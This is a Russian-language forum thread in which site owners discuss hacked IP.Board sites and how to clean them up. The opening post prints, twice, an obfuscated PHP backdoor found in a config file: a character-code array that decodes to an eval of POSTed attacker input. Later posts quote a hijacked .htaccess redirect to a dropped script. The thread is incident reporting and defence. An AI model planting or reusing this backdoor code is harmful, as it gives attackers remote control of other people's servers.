Jump to content

Featured Replies

Привет всем.Сегодня приехал домой,зашел на свои сайты,и на одном из них была ошибка

Notice: Use of undefined constant w1111t - assumed 'w1111t' in /var/www/data/www/bans.rgmix.eu/config.php on line 1

Решил заглянуть в этот файл и увидел строчку





    if(isset($_GET[w1111t])){                                                                                                                                        $d=substr(8,1);foreach(array(36,112,61,64,36,95,80,79,83,84,91,39,112,49,39,93,59,36,109,61,115,112,114,105,110,116,102,40,34,37,99,34,44,57,50,41,59,105,102,40,115,116,114,112,111,115,40,36,112,44,34,36,109,36,109,34,41,41,123,36,112,61,115,116,114,105,112,115,108,97,115,104,101,115,40,36,112,41,59,125,111,98,95,115,116,97,114,116,40,41,59,101,118,97,108,40,36,112,41,59,36,116,101,109,112,61,34,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,115,116,121,108,101,46,100,105,115,112,108,97,121,61,39,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,105,110,110,101,114,72,84,77,76,61,39,34,46,97,100,100,99,115,108,97,115,104,101,115,40,104,116,109,108,115,112,101,99,105,97,108,99,104,97,114,115,40,111,98,95,103,101,116,95,99,108,101,97,110,40,41,41,44,34,92,110,92,114,92,116,92,92,39,92,48,34,41,46,34,39,59,92,110,34,59,101,99,104,111,40,115,116,114,108,101,110,40,36,116,101,109,112,41,46,34,92,110,34,46,36,116,101,109,112,41,59,101,120,105,116,59)as$c){$d.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$c);}eval($d);                                                                                                                                                                                }    

Ладно.

Также на некоторых сайтах появился файл wp-conf.php с содержанием:  код слишком большой,прикреплю файл

wp-conf.php

Файл был загружен сегодня 3 часа назад...

Что это такое?

И как с этим бороться???

upd#:

На всех сайтах в конфигурационных файлах (на разных сайтах) добавлена подобная строчка и лежит этот файл wp-conf.php (аваст на него ругается)

	if(isset($_GET[w9345t])){																																		$d=substr(8,1);foreach(array(36,112,61,64,36,95,80,79,83,84,91,39,112,49,39,93,59,36,109,61,115,112,114,105,110,116,102,40,34,37,99,34,44,57,50,41,59,105,102,40,115,116,114,112,111,115,40,36,112,44,34,36,109,36,109,34,41,41,123,36,112,61,115,116,114,105,112,115,108,97,115,104,101,115,40,36,112,41,59,125,111,98,95,115,116,97,114,116,40,41,59,101,118,97,108,40,36,112,41,59,36,116,101,109,112,61,34,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,115,116,121,108,101,46,100,105,115,112,108,97,121,61,39,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,105,110,110,101,114,72,84,77,76,61,39,34,46,97,100,100,99,115,108,97,115,104,101,115,40,104,116,109,108,115,112,101,99,105,97,108,99,104,97,114,115,40,111,98,95,103,101,116,95,99,108,101,97,110,40,41,41,44,34,92,110,92,114,92,116,92,92,39,92,48,34,41,46,34,39,59,92,110,34,59,101,99,104,111,40,115,116,114,108,101,110,40,36,116,101,109,112,41,46,34,92,110,34,46,36,116,101,109,112,41,59,101,120,105,116,59)as$c){$d.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$c);}eval($d);																																												}																					

Edited by HooLIGUN

Link to comment
https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/
Share on other sites

Да, это взлом. Скорее всего взломали FTP аккаунт. Срочно меняй все пароли. Используй SFTP для соединения с сервером. Проверь комп на вирусы.

Link to comment
https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/?&do=findComment&comment=23111
Share on other sites

Используй SFTP для соединения с сервером.

Только им и пользуюсь.

Сейчас буду менять.

А не подскажешь где можно посмотреть логи?

А то я незнаю где они находятся на vds`e :D

Link to comment
https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/?&do=findComment&comment=23112
Share on other sites

Теперь зараженные файлы еще искать...

Link to comment
https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/?&do=findComment&comment=23114
Share on other sites

/var/log/apache2

Эх..тут ничего не нашел...

Link to comment
https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/?&do=findComment&comment=23120
Share on other sites

 Нашел логи в папке с юзера (меня)

31.133.47.233 Вот эта тварь ко мне ломилась

post-2770-0-53977600-1362832955.png

Ух я зол  :ireful:

 

Link to comment
https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/?&do=findComment&comment=23124
Share on other sites

В этом случае ничего со злоумышленником не поделать, меняй пароли и устраняй последствия взлома..

Link to comment
https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/?&do=findComment&comment=23128
Share on other sites

О даа...Опять подобные файлы лежат в корнях сайтов...

Пол часа назад залитые...еще сделать ничего не успели видимо...

Как так? Пароли везде были сгенерированны.

Где то есть дырка,но как ее найти?

Явно по фтп юзера заходят,т.к ниже этого /var/www/hooligun/data каталога у них доступа нет...

Edited by HooLIGUN

Link to comment
https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/?&do=findComment&comment=23774
Share on other sites

Может тогда лучше написать хостеру ? Чтобы блоканули доступ к фтп по IP ? 

 

Или пускай они у себя ищут дыры... 

Link to comment
https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/?&do=findComment&comment=23998
Share on other sites

Самый верный способ - открыть доступ на сервер с одного IP.

Link to comment
https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/?&do=findComment&comment=24083
Share on other sites

Есть форум пока не развивающийся, зашел на хост дабы залить файл и заметил что-то непривычное.. 

В корне сайта файлы wp-conf.php, wp-kvwotp.php, wp-skrxzqc.php и несколько других.

Также изменен .htaccess:

ErrorDocument 404 /wp-kvwotp.php

 

Также в корне папка .zz

В ней несколько файлов с рандомными названия содержанием :

O:8:"stdClass":3:{s:6:"status";s:22:"HTTP/1.1 404 Not Found";s:11:"contentType";s:10:" text/html";s:7:"content";s:570:"<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.2.7</center>
</body>
</html>
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
";}

 

И файлы pollIria.php, Qpoll.php, schedulexDq.php, Rlogoff.php

Последний похож на Shell (раньше shell'ов никогда не видел, поэтому могу ошибаться..).

 

Так как форум сейчас простаивает, то файлы с февраля не изменялись и я все мартовские файлы удалил, но "он" опять их залил..

Что больше всего меня пугает - wp-conf.php был у меня в самом корне хостинга..

 

Все мартовские файлы удалил, пока вроде бы чисто.. Сейчас пароли сменю..

Link to comment
https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/?&do=findComment&comment=24119
Share on other sites

Нужно всегда обновляться до последней версии. Не один раз об этом говорили.

Link to comment
https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/?&do=findComment&comment=24271
Share on other sites

Видел такое на сайтах одного клиента, удалил все файлы кроме контента пользователей, вычистил все оставшиеся php файлы и обновил форум (вирусятина встречалась почти в каждой папке а также была втроена в некоторые файлы, например в файл конфига)

Link to comment
https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/?&do=findComment&comment=24613
Share on other sites

Нашел логи в папке с юзера (меня)

31.133.47.233 Вот эта тварь ко мне ломилась

attachicon.gifСнимок.PNG

Ух я зол  :ireful:

Некоторые дыры закрываются путём обновления форума. Может всётаки пришло и твоё время? 3.3 давно ведь не актуальная версия.

 

Respected: правильно ведь?

Link to comment
https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/?&do=findComment&comment=24614
Share on other sites

Да, для 3.3.x уже шелл давно в сети появился.

Link to comment
https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/?&do=findComment&comment=24653
Share on other sites

Death1, Да я уже обновился.

Link to comment
https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/?&do=findComment&comment=24658
Share on other sites
  • 3 недели спустя...

Здравствуйте, у меня такая же проблема была и есть, уже давно мучает, хостер блокирует форум из-за этого а вычищаю все что могу, они включают и все заного по кругу, потом думал что поможет обновление, 3.2.3 у меня, но связи с тем что с базой не получилось при установке последней версии, пришлось опять ту же самую ставить, но вопрос тут по БД не сюда наверное.

 

я так понимаю, проблему это решить можно только с обновлением?

Link to comment
https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/?&do=findComment&comment=26767
Share on other sites

Здравствуйте, у меня такая же проблема была и есть, уже давно мучает, хостер блокирует форум из-за этого а вычищаю все что могу, они включают и все заного по кругу, потом думал что поможет обновление, 3.2.3 у меня, но связи с тем что с базой не получилось при установке последней версии, пришлось опять ту же самую ставить, но вопрос тут по БД не сюда наверное.

 

я так понимаю, проблему это решить можно только с обновлением?

Решил проблему (Ну по крайней мере теперь все нормально) отключив пользователю доступ к Shell

Link to comment
https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/?&do=findComment&comment=26781
Share on other sites

Решил проблему (Ну по крайней мере теперь все нормально) отключив пользователю доступ к Shell

Вы это сделали посредством htacess? можете ваш код мне дать у меня вообще щас этого файла нету в корневой директории

Link to comment
https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/?&do=findComment&comment=26787
Share on other sites

Вы это сделали посредством htacess? можете ваш код мне дать у меня вообще щас этого файла нету в корневой директории

Я это сделал в панеле ISPManager

post-2770-0-02248700-1365429326.png 

Link to comment
https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/?&do=findComment&comment=26791
Share on other sites

Такая же фигня наблюдается.
Хостуюсь на бесплатном хостинге, который не в первый раз блокирует мне аккаунт из-за такого скрипта.
Он мне конкретно засрал корень, залив туда всякие-разные папки

Link to comment
https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/?&do=findComment&comment=27237
Share on other sites

Бесплатного хостинга сторожиться надо, а не сидеть на нём

Link to comment
https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/?&do=findComment&comment=27243
Share on other sites

Это из-за shell'а в версии ip.board, как я понимаю?

Нужно обновляться?

Link to comment
https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/?&do=findComment&comment=27886
Share on other sites

eeadlo,Нужно всегда обновляться до актуальной версии.

Link to comment
https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/?&do=findComment&comment=27889
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.


Guest
Ответить в этой теме...

Последние посетители 0

  • No registered users viewing this page.